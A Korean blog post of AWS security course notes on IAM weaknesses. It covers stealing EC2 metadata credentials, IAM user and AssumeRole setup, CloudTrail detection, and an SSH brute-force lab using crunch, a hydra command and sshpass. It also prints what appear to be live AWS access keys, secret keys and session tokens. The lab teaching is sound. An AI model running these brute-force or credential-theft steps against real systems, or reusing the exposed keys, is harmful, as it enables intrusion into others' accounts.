• 티스토리 홈
  • 프로필사진
    59lee
  • 방명록
  • 공지사항
  • 태그
  • 블로그 관리
  • 글 작성
59lee
  • 프로필사진
    59lee
    • 분류 전체보기 (73)
      • AWS (11)
      • 대외활동 (0)
      • 솔루션 아키텍트 (0)
      • 운영체제 (1)
      • 모바일 (1)
      • AHSS[1기] (9)
      • TOPCIT (2)
      • 네트워크 관리사 (2)
      • 악성코드 분석 (1)
      • 웹 취약점 진단 (2)
      • 파이썬 (0)
      • 자바 (0)
      • aws (1)
      • 자격증 (0)
      • 보안컨설팅 (6)
      • 침해사고 대응 (0)
      • 5파트 개인정보 보호법 (4)
      • 4파트 (10)
      • 3파트 (0)
      • 2파트 (0)
      • 1파트 (4)
      • 정보보안솔루션 (2)
      • CISA (12)
  • 방문자 수
    • 전체:
    • 오늘:
    • 어제:
  • 최근 댓글
      등록된 댓글이 없습니다.
    • 최근 공지
        등록된 공지가 없습니다.
      # Home
      # 공지사항
      #
      # 태그
      # 검색결과
      # 방명록
      • 2주차(9.3) : IAM 취약점 및 보안
        2023년 08월 25일
        • 59lee
        • 작성자
        • 2023.08.25.:30

        [eGISEC 2023] 사이버 공격 90%, 계정 탈취에서 시작

         

        [eGISEC 2023] 사이버 공격 90%, 계정 탈취에서 시작

        “누구나 사이버 공격에 노출될 수 있는데... 실수하더라도 계정을 보호할 순 없을까. 사용자나 관리자가 속아서 실수로 악성코드 구동하면... 실수를 하더라도 데이터를 보호하는 방법이 있다

        www.boannews.com

         

        북한의 사이버 공격자들, 깃허브의 개발자들 노리고 있다

         

        북한의 사이버 공격자들, 깃허브의 개발자들 노리고 있다

        북한 정권의 지원을 받는 해킹 그룹인 라자루스(Lazarus)가 다시 한 번 사기 행각을 벌이다가 발각됐다. 이번에는 정상적인 깃허브(GitHub) 계정을 가진 개발자 혹은 채용 담당자로 위장해 개발자들

        www.boannews.com

         

        깃허브, 3월 13일부터 모든 컨트리뷰터들이 이중인증 사용하게 한다

         

        깃허브, 3월 13일부터 모든 컨트리뷰터들이 이중인증 사용하게 한다

        보안 외신 SC미디어에 의하면 코드 리포지터리인 깃허브(GitHub)에 코드를 한 번이라도 제출한 개발자라면 3월 13일부터 이중인증을 반드시 사용해야 하도록 방침을 변경했다고 한다. 즉 이번 주부

        www.boannews.com

         

        클라우드에 빈틈만 보이면 암호화폐 채굴을 시작하는 사이버 공격자들

         

        클라우드에 빈틈만 보이면 암호화폐 채굴을 시작하는 사이버 공격자들

        사이버 공격자들이 클라우드 계정들을 공략하고 있다. 그 목적은 암호화폐 채굴이다. 클라우드를 통해 워크로드를 분산시켜 암호화폐 채굴을 활성화 하는 것이 공격자들 사이에서 나타나는 최

        www.boannews.com

         

         

        ahss-ec22_2ea.yaml
        0.01MB

         

        웹서버 IP로 접근

         

        whoami

         

        현재 디렉토리 확인

         

        파일 확인

         

        passwd 확인

         

        hostnamectl

         

        ip route

         

        curl 정보 파악

         

        curl로 ip 정보 획득

         

        퍼플릭 ip 정보 획득

         

        curl 메타 데이터 확인

         

        iam 인스턴스 role 확인

         

        키와 토큰 확인

         

        웹서버 안에서 확인

         

        메타데이터 확인

         

        액세스 키와 토큰 확인(웹서버)
        웹 서버 접근 로그 확인

         

        암스트레담

         

        공격자에 키, 토큰 값 등록

         

        s3 확인

         

        ec2 확인

         

        CloudTail 이벤트 기록

         

        S3 버킷 조회 기록 확인

         

        S3 조회 권한이 없음

         

        AssumeRole 확인

         

        IAM 역할 확인

         

        인스턴스에 역할 할당 된 거 확인

         

        메타데이터 설정 확인

         

        # aws cli 설치 및 버전 확인
        aws --version
        
        # caller id 확인
        aws sts get-caller-identity
        
        # 자신의 AWS 계정 ID 변수 지정
        export ACCOUNT_ID=$(aws sts get-caller-identity --query 'Account' --output text)
        echo $ACCOUNT_ID
        
        # 페이저 사용 비활성화
        export AWS_PAGER=""
        

         

        위에 명령어 그대로

         

         

        # user1 사용자 생성
        **aws iam create-user --user-name user1**
        
        # user2 사용자 생성
        **aws iam create-user --user-name user2**
        
        # user1 사용자의 AWS Web Console 로그인 profile 생성 - [링크](<https://docs.aws.amazon.com/cli/latest/reference/iam/create-login-profile.html>)
        cat < create-login-profile-user1.json
        {
            "UserName": "**user1**",
            "Password": "**Ahss\\$1234**",
            "PasswordResetRequired": false
        }
        EOF
        cat create-login-profile-user1.json | jq
        **aws iam create-login-profile --cli-input-json file://create-login-profile-user1.json**
        
        # user2 사용자의 AWS Web Console 로그인 profile 생성 - [링크](<https://docs.aws.amazon.com/cli/latest/reference/iam/create-login-profile.html>)
        cat < create-login-profile-user2.json
        {
            "UserName": "**user2**",
            "Password": "**Ahss\\$1234**",
            "PasswordResetRequired": false
        }
        EOF
        cat create-login-profile-user2.json | jq
        **aws iam create-login-profile --cli-input-json file://create-login-profile-user2.json**
        
        # iam 사용자 리스트 확인
        aws iam list-users | jq
        
        # 사용자에게 프로그래밍 방식 액세스 권한 부여
        **aws iam create-access-key --user-name user1**
        {
            "AccessKey": {
                "UserName": "user1",
                "AccessKeyId": "**AKIA5ILF2FJITUNS2S5S**",
                "Status": "Active",
                "SecretAccessKey": "**N8joouRZdBBuKdV1IjssI0ICDi5SzjGn1Bc7SHOw**",
                "CreateDate": "2023-09-03T06:21:17+00:00"
            }
        }
        
        **aws iam create-access-key --user-name user2**
        {
            "AccessKey": {
                "UserName": "user2",
                "AccessKeyId": "**AKIA5ILF2FJIR2IDM5VK**",
                "Status": "Active",
                "SecretAccessKey": "**x/p+1LE9eDkYsbjYXoa7h8R95V49JtN5Siyoenqa**",
                "CreateDate": "2023-09-03T06:21:27+00:00"
            }
        }
        
        # 사용자에 정책을 추가
        **aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name user1**
        **aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess --user-name user2**
        

         

        IAM 유저 만들기

         

        json 파일 확인(user1)

         

        json파일(user2)

         

        IAM user 확인

         

        프로그래밍 방식

         

        정보 안 나오니까 미리 매모

         

        [cloudshell-user@ip-10-4-78-8 ~]$ aws iam create-access-key --user-name user1
        {
            "AccessKey": {
                "UserName": "user1",
                "AccessKeyId": "AKIAVSG277YLP3GEEJGI",
                "Status": "Active",
                "SecretAccessKey": "0Hfe7J7ejX0iKv79wQiX0kyEXlrMp5WoHJmEUh0t",
                "CreateDate": "2023-09-07T14:19:47+00:00"
            }
        }
        [cloudshell-user@ip-10-4-78-8 ~]$ aws iam create-access-key --user-name user2
        {
            "AccessKey": {
                "UserName": "user2",
                "AccessKeyId": "AKIAVSG277YLPUVM2T4L",
                "Status": "Active",
                "SecretAccessKey": "c6cUwkkyrfanU4+P9MywHlpO1dNhgtSPJA9w7fn2",
                "CreateDate": "2023-09-07T14:19:55+00:00"
            }
        }

         

         

        사용자 정책 추가

         

        정책 추가(user1)

         

        정책 추가(user2)

         

        https://chrome.google.com/webstore/detail/multilogin/ijfgglilaeakmoilplpcjcgjaoleopfi

         

        MultiLogin

        Using websites with multiple accounts at the same time is made easy. Create an independent tab with a click of a button.

        chrome.google.com

         

        user 권한 확인

         

        # 시도
        aws s3 ls
        
        # user1 자격증명 profile 생성 : 위 메모 복붙
        **aws configure --profile user1**
        AWS Access Key ID [None]: **AKIA5ILF2FJITUNS2S5S**
        AWS Secret Access Key [None]: **N8joouRZdBBuKdV1IjssI0ICDi5SzjGn1Bc7SHOw**
        Default region name [None]: **ap-northeast-2**
        Default output format [None]:
        
        # user2 자격증명 profile 생성 : 위 메모 복붙
        **aws configure --profile user2**
        AWS Access Key ID [None]: **AKIA5ILF2FJIR2IDM5VK**
        AWS Secret Access Key [None]: **x/p+1LE9eDkYsbjYXoa7h8R95V49JtN5Siyoenqa**
        Default region name [None]: **ap-northeast-2**
        Default output format [None]:
        
        # 자격 증명 정보 저장되는 파일 확인
        **cat ~/.aws/credentials**
        

         

        자격증명 파일 생성

         

        자격 파일 확인

         

        # caller id 확인
        aws sts get-caller-identity --profile user1 | jq
        aws sts get-caller-identity --profile user2 | jq
        
        # 자격증명 사용 확인
        aws s3 ls --profile user1
        aws s3 ls --profile user2
        aws ec2 describe-vpcs --profile user1 | jq
        aws ec2 describe-vpcs --profile user2 | jq
        
        # S3 버킷 생성
        NICKNAME=<각자 자신의 닉네임>
        NICKNAME=gasida
        #aws s3 mb s3://***버킷***(유일한 이름) --region ap-northeast-2
        aws s3 mb s3://ahss-2w-$NICKNAME   --region ap-northeast-2 --profile user1
        aws s3 mb s3://ahss-2w-$NICKNAME-2 --region ap-northeast-2 --profile user2
        
        # S3 버킷 조회
        aws s3 ls --profile user2
        

         

        caller id 확인

         

        user1,2에서 엑세스 파일 확인

         

        자격증명 확인(user1)

         

        자격증명 확인(user2)

         

        s3 버킷 생성

        # user2 사용자에 인라인 정책을 추가 : STS 서비스의 AssumeRole Action 허용
        cat <<EOF > allow-assume-role.json
        {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "allowassumerole",
                    "Effect": "Allow",
                    "Action": "sts:AssumeRole",
                    "Resource": "*"
                }
            ]
        }
        EOF
        cat allow-assume-role.json | jq
        aws iam put-user-policy --user-name **user2** --policy-name allow-assume-role --policy-document file://allow-assume-role.json
        

        인라인 정책 추가

         

        #
        export ACCOUNT_ID=$(aws sts get-caller-identity --query 'Account' --output text)
        cat <<EOF > MyAccount-AssumeRole.json
        {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Effect": "Allow",
                    "Action": "sts:AssumeRole",
                    "Principal": {
                        "AWS": "$ACCOUNT_ID"
                    },
                    "Condition": {}
                }
            ]
        }
        EOF
        cat MyAccount-AssumeRole.json | jq
        aws iam create-role --role-name **assume-role-s3full** --assume-role-policy-document file://MyAccount-AssumeRole.json **--max-session-duration 7200**
        {
            "Role": {
                "Path": "/",
                "RoleName": "assume-role-s3full",
                "RoleId": "AROA5ILF2FJITESCKZOAO",
                "Arn": "arn:aws:iam::911283464785:role/assume-role-s3full",
                "CreateDate": "2023-09-03T06:46:47+00:00",
                "AssumeRolePolicyDocument": {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Effect": "Allow",
                            "Action": "sts:AssumeRole",
                            "Principal": {
                                "AWS": "911283464785"
                            },
                            "Condition": {}
                        }
                    ]
                }
            }
        }
        
        # assume-role-s3full IAM Role 에 AmazonS3FullAccess 정책 적용
        aws iam attach-role-policy --role-name **assume-role-s3full** --policy-arn arn:aws:iam::aws:policy/**AmazonS3FullAccess**
        

         

        권한 가진 IAM Role 생성

         

        IAM Role 확인

         

        정책 추가 확인

         

        # AssumeRole 을 통해 임시자격증명 발급
        export ACCOUNT_ID=$(aws sts get-caller-identity --query 'Account' --output text --profile user2)
        #aws sts assume-role --role-arn arn:aws:iam::"$ACCOUNT_ID":role/assume-role-s3full --role-session-name <각자 편한이름 지정> --query "Credentials.[AccessKeyId,SecretAccessKey,SessionToken]" --output text
        aws sts assume-role --role-arn arn:aws:iam::"$ACCOUNT_ID":role/**assume-role-s3full** --role-session-name **MyS3accessSession** --profile **user2**
        {
            "Credentials": {
                "AccessKeyId": "ASIA5ILF2FJI4JPGYCJ4",
                "SecretAccessKey": "VxLRnDNrgDFcsAWd+Kruqtdjr75Ej/OioApIIRHO",
                "SessionToken": "IQoJb3JpZ2luX2VjEE8aDmFwLW5vcnRoZWFzdC0yIkcwRQIgZMrgq7zxDCTVY39s+COI/DhesFgol/XbmbocHkcBKqACIQD6JfI/2nru3xmOrrqF+iw7Fm9dIAK5hpnkCNRIzGt95CqeAggoEAIaDDkxMTI4MzQ2NDc4NSIMTSm0mTnWwl9tj2IVKvsBr4qP7ZZNg0YxcpFFmsECtxi9WTAQH6a3uyt6Lb5KTpN93gZgnr0LdqFl2ZTj6TBZ7Wdrj47uao0ZalxFK8ltGuBEQLUbNHfF432/GhYnLnmSt2GNwGLcEcrEAL6ILE8l9CsUFv4VKcEcE3OJ8f8K5r3xrR1Zp5dy8Vj2KCf92LS9MDP5YqXJUvYQaBloiIrKeBiov9ykwclJ3y+D0+g9p4DklE8kLNjcj28PopNAp1VM+Rilf/lpOTjWWi0VM1GQO+qEdivSBPWUtJlvq15mlA89DsPEDPM/2K4hI3lJUI59djTYJCfGAJj55srqA52sXPcTC6HWh9I60+AwodnQpwY6nQEk/pdlajJGV7SKkAzWAWylivc2POARHYa3VYoDlK8g7tvghxVSjOVOcwGsfYvPihxFTjuw1k/tYWepg+6sgE8BvaxbWbMj0QZPBqcv6S4sgShXq0P6njDU02y+ZtD0H8ZfS/eapd0lUfEbbXxzIbhmjGAwIM9ihsTD+EhaVTskaYnA//pFq8pem06MoXFWy69hYlLJswZYFOmOXlsh",
                "Expiration": "2023-09-03T07:50:09+00:00"
            },
            "AssumedRoleUser": {
                "AssumedRoleId": "AROA5ILF2FJITESCKZOAO:MyS3accessSession",
                "Arn": "arn:aws:sts::911283464785:assumed-role/assume-role-s3full/MyS3accessSession"
            }
        }
        
        # 위에서 출력된 AccessKeyId , SecretAccessKey , SessionToken 으로 임시자격증명 적용
        export AWS_ACCESS_KEY_ID="ASIA5ILF2FJI4JPGYCJ4"
        export AWS_SECRET_ACCESS_KEY="VxLRnDNrgDFcsAWd+Kruqtdjr75Ej/OioApIIRHO"
        export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEE8aDmFwLW5vcnRoZWFzdC0yIkcwRQIgZMrgq7zxDCTVY39s+COI/DhesFgol/XbmbocHkcBKqACIQD6JfI/2nru3xmOrrqF+iw7Fm9dIAK5hpnkCNRIzGt95CqeAggoEAIaDDkxMTI4MzQ2NDc4NSIMTSm0mTnWwl9tj2IVKvsBr4qP7ZZNg0YxcpFFmsECtxi9WTAQH6a3uyt6Lb5KTpN93gZgnr0LdqFl2ZTj6TBZ7Wdrj47uao0ZalxFK8ltGuBEQLUbNHfF432/GhYnLnmSt2GNwGLcEcrEAL6ILE8l9CsUFv4VKcEcE3OJ8f8K5r3xrR1Zp5dy8Vj2KCf92LS9MDP5YqXJUvYQaBloiIrKeBiov9ykwclJ3y+D0+g9p4DklE8kLNjcj28PopNAp1VM+Rilf/lpOTjWWi0VM1GQO+qEdivSBPWUtJlvq15mlA89DsPEDPM/2K4hI3lJUI59djTYJCfGAJj55srqA52sXPcTC6HWh9I60+AwodnQpwY6nQEk/pdlajJGV7SKkAzWAWylivc2POARHYa3VYoDlK8g7tvghxVSjOVOcwGsfYvPihxFTjuw1k/tYWepg+6sgE8BvaxbWbMj0QZPBqcv6S4sgShXq0P6njDU02y+ZtD0H8ZfS/eapd0lUfEbbXxzIbhmjGAwIM9ihsTD+EhaVTskaYnA//pFq8pem06MoXFWy69hYlLJswZYFOmOXlsh"
        export 
        
        # caller id 확인
        aws sts get-caller-identity | jq
        
        # S3 버킷 생성
        NICKNAME=<각자 자신의 닉네임>
        NICKNAME=gasida
        #aws s3 mb s3://***버킷***(유일한 이름) --region ap-northeast-2
        aws s3 mb s3://ahss-2w-$NICKNAME-2 --region ap-northeast-2
        
        # S3 버킷 조회
        aws s3 ls
        
        # S3 버킷 삭제
        aws s3 rb s3://ahss-2w-$NICKNAME
        aws s3 rb s3://ahss-2w-$NICKNAME-2
        
        # (참고) 임시자격증명 제거
        unset AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_SESSION_TOKEN
        

         

        임시자격 요청

         

        {
            "Credentials": {
                "AccessKeyId": "ASIAVSG277YLEO5FJCSA",
                "SecretAccessKey": "EVkh6g653zBsfjpglUILkW05E3e+21vACeOIrQSH",
                "SessionToken": "IQoJb3JpZ2luX2VjELf//////////wEaDmFwLW5vcnRoZWFzdC0yIkgwRgIhALPCqZOh4/WylmU1Fm3BzLvaipdaULtBzvpzLx0O7PZSAiEAvN3c8nqdGBTz9yPvyjH3Fdz3RKvHWvRRiEyp/Gk5aGYqpwIIkP//////////ARAAGgwzODI3MTEzNjUxNDIiDGww6Z8PrI7wG3rehir7AUrgIAMgCkfsh74D0H5XBqvT+LWqpxthQqUGgEvmgbDUxdE1ffwHrMgBmXneHnNTmP/fn7/4GyNAJ1UT9w3g7ldU9EMWuEIjLIsmSiWtmj00w7/2c5FbZh3w5E78mqFsC+xL0D+zmH84IscQ/jqN90vC5tZPMsQK/v/fRy8jak3iuIdyXO4CSWJujzKNt7RuPTQ9vWiBw2+2h2ywhOUP87lQDHOTOcFkj15cPImqBXoH93N6R1jhCirD56bmhAkF1dxU00h2HP0F5XS8bRmqwaauKc3+qc4w/Ur76mfAghv4RMb8rQzkwSnyCT0vHiwMzfjikARLOydZeJKoMIzM56cGOpwBSyHFGsAK7eRujwPetRw9P63zInCWc0/CTNaJRdR5r4A4P5SHZe6DSuHk0dS+Zko8wi6SJga/JaPmuN5OBS1MKpWPlvTYpiZe+1sJb9V51uqwtHI3cDuYKbPEFpg+iLmL/fcxvwVELIUGeuHrMBaxQyFLOA8NsKFrxmjaQKTYKXjSoqmI9ognZgKqvKJuq7R2ILILYmO8/lhe8Z4x",
                "Expiration": "2023-09-07T16:02:36+00:00"
            },
            "AssumedRoleUser": {
                "AssumedRoleId": "AROAVSG277YLI2QIJG3TK:MyS3accessSession",
                "Arn": "arn:aws:sts::382711365142:assumed-role/assume-role-s3full/MyS3accessSession"
            }
        }

         

        모두 입력

         

        caller id

         

        버킷 생성

         

        버킷 삭제 및 엑세스 삭제

         

        복사 후 user 웹 링크에 붙이기

         

        role 모자

         

         

        모자 쓰면 그 역할 가능

        # 관리자 확인
        whoami
        
        # SSH 접속 로그 출력
        more /var/log/secure
        grep Invalid /var/log/secure
        **w**
        
        # root 계정의 암호 설정 - 취약한 암호이며 실습 후 바로 해당 EC2를 삭제 할 것
        passwd
        New password: **12qw**
        Retype new password: **12qw**
        ...
        
        # 실시간 로그 출력
        **tail -f /var/log/secure**
        

         

        웹서버 확인

         

        취약한 패스워드 설정

         

        로그 확인

         

        Attack

         

        # [**crunch tool**](<https://tools.kali.org/password-attacks/crunch>) 로 사전 파일 생성 - [참고링크](<https://blog.naver.com/choda100/220819457582>) [참고영상](<https://youtu.be/0ouVxR7hLvE>)
        cd /root/crunch-3.6
        **./crunch 4 4 12qw -o 4chars.txt**
        
        # 사전 파일 확인, 256개의 암호 생성
        more 4chars.txt
        more 4chars.txt |wc -l
        256
        
        # [**Hydra tool**](<https://tools.kali.org/password-attacks/hydra>) 로 SSH Brute force attack 시도
        hydra -h
        **hydra -l root -P 4chars.txt -t 10 -f -V ssh://10.0.0.10**
        ...
        [22][ssh] host: 10.0.0.10   login: root   password: **12qw**
        ...
        
        # 리모트 명령 실행
        sshpass -p '12qw' ssh -o StrictHostKeyChecking=no root@**10.0.0.10 hostname**
        sshpass -p '12qw' ssh -o StrictHostKeyChecking=no root@**10.0.0.10 ip -c addr**
        

         

         

        # 사전 파일 획득
        ## (옵션) 구글링 - 최애(자주 쓰는) 암호 Top 10/100 리스트, Kali Linux 등등
        ## (옵션) [**Rockyou**](<https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt>) 대용량 사전 파일 - 일천사백만개 암호 리스트 > 필요한 부분만 별도의 파일로 만들어서 사용
        cd
        more /root/rockyou.txt
        less /root/rockyou.txt
        wc -l /root/rockyou.txt
        14344394
        
        grep password /root/rockyou.txt
        grep cisco /root/rockyou.txt
        grep -F '***' /root/rockyou.txt
        
        ## (옵션) **Cupp tool** 개인 정보 기반 암호 리스트 생성 - [참고링크](<https://www.hackingarticles.in/comprehensive-guide-on-cupp-a-wordlist-generating-tool/>)
        python3 /root/cupp.py -i  → 뒤 질문은 전부 N 하자
        생성된 파일 확인
        more ~
        

        rockyou 확인

         

        개인정보 기반 암호 리스트

         

        Unauthorized IAM Credential Use - Simulation and Detection (공격과 발견 실습 포함) - 링크 ← 미국 동부(버지니아 리전) 실습

         

        Cryptominer Based Security Events - Simulation and Detection (공격과 발견 실습 포함) - 링크 ← 미국 동부(버지니아 리전) 실습

         

        **CTF & Challenge**

        • IAM Challenge https://bigiamchallenge.com/challenge/1
        • r00tz CTF on AWS https://r00tz-ctf.awssecworkshops.com/
        • AWS challenge http://flaws.cloud/
         

        flAWS

        <!-- ############################################################################### # You're not going to find anything in the HTML code. # This is an AWS challenge. None of what you used in other challenges will be # helpful here. #######################

        flaws.cloud

         

        Destroying Long-Lived Cloud Credentials with Workload Identity Federation - 링크 → 고정/장기 키 사용 최소화

         

         

        classmethod : 그림 설명 잘되어 있음, 한국어로 번역 후 볼 것! - 링크

         

        クラスメソッド発「やってみた」系技術メディア | DevelopersIO

        DevelopersIOは、AWS、iOS/Androidアプリ、ビッグデータ、Alexa等の最新技術情報からリモートワークや働き方に関する記事まで多彩なトピックを紹介するクラスメソッドのオウンドメディアです。

        dev.classmethod.jp

         

        AWS Workshop [AWS Workshop] (KR) Data Perimeter Workshop : 데이터 경계 제어 구축 - 링크 ⇒ 2개의 AWS 계정이 반드시 필요

         

        Data Perimeter Workshop

        This workshop will teach you about the AWS services and features available for creating a perimeter around your data. You will configure restrict access to data to authorized users from expected network locations, such as your Amazon VPC or corporate netwo

        catalog.us-east-1.prod.workshops.aws

         

        1. 실습 1~4 에서는 AWS Systems Manager Session Manager를 사용하여 VPC의 EC2 인스턴스에 액세스합니다. VPC 자체는 인터넷에 연결되어 있지 않으며 VPC 엔드포인트를 통해 모든 리소스에 연결됩니다.
        2. 실습 1 에서는 CloudTrail 버킷 콘텐츠에 액세스하고 특정 보안 주체만 콘텐츠에 액세스할 수 있도록 허용하는 버킷 정책을 생성합니다. 그런 다음 실습 2에서는 해당 버킷 정책을 업데이트하여 리소스에 액세스하는 데 사용할 수 있는 네트워크를 제한합니다.
        3. 실습 2 에서는 AWS 관리 콘솔을 사용하여 Amazon Athena에 액세스하고 CloudTrail 버킷에 있는 데이터에 대한 쿼리를 실행합니다.
        4. 그런 다음 실습 3 에서는 파트너의 S3 데이터 버킷에 액세스하여 원하지 않는 액세스 패턴을 보여줍니다.
        5. 계속해서 실습 3에서는 교차 계정 액세스를 방지하기 위해 특정 계정의 보안 주체만 네트워크의 S3 리소스에 액세스할 수 있도록 S3 VPC 엔드포인트 정책을 업데이트 합니다. 실습 4 에서는 해당 정책을 다시 업데이트하여 네트워크에서 액세스할 수 있는 리소스를 제한합니다.
        6. 마지막으로 실습 5에서는 AWS Management Console을 다시 사용하여 IAM 역할로 액세스할 수 있는 S3 리소스를 제한하는 IAM 정책을 생성하고 AWS 소유의 퍼블릭 S3 버킷에서 해당 정책을 테스트 합니다.

         

         

        **AWS SAML + Keycloak**

        • Keycloak 구축 및 AWS SAML 연동 - 링크
        • Keycloak 소개 및 연동 - 링크
        • AWS에서 Keycloak 기반 서비스 인증 체제 구축 - 링크
        • [AWS Blog] Configure Keycloak on Amazon Elastic Kubernetes Service (Amazon EKS) using Terraform - 링크
        • [AWS Blog] Federate Amazon QuickSight access with open-source identity provider Keycloak - 링크
        • [AWS Blog] Configure SAML federation for Amazon OpenSearch Serverless with AWS IAM Identity Center - 링크
         

        Configure SAML federation for Amazon OpenSearch Serverless with AWS IAM Identity Center | Amazon Web Services

        Amazon OpenSearch Serverless is a serverless option of Amazon OpenSearch Service that makes it easy for you to run large-scale search and analytics workloads without having to configure, manage, or scale OpenSearch clusters. It automatically provisions and

        aws.amazon.com

         

        • 실습 환경 삭제
          1. AWS CloudFormation Stack 삭제
          2. IAM User 삭제 : user1, user2
          3. IAM Role 삭제 : assume-role-s3full
           

        스택 삭제

         

        삭제 중

         

        스택 삭제 완료
        역할 삭제
        user1 삭제
        user2 삭제

        'AHSS[1기]' 카테고리의 다른 글

        4주차(9.17) : AWS WA Labs : Security  (0) 2023.08.25
        3주차(9.10) - 웹 취약점 및 보안  (0) 2023.08.25
        1주차(8.27): S3 취약점 및 보안  (0) 2023.08.25
        1주차(8.27): S3 취약점 및 보안 스터디 듣기 전 준비  (0) 2023.08.25
        AWS 스터디 사전 준비  (0) 2023.08.24
        다음글
        다음 글이 없습니다.
        이전글
        이전 글이 없습니다.
        댓글
      조회된 결과가 없습니다.
      스킨 업데이트 안내
      현재 이용하고 계신 스킨의 버전보다 더 높은 최신 버전이 감지 되었습니다. 최신버전 스킨 파일을 다운로드 받을 수 있는 페이지로 이동하시겠습니까?
      ("아니오" 를 선택할 시 30일 동안 최신 버전이 감지되어도 모달 창이 표시되지 않습니다.)
      목차
      표시할 목차가 없습니다.
        • 안녕하세요
        • 감사해요
        • 잘있어요

        티스토리툴바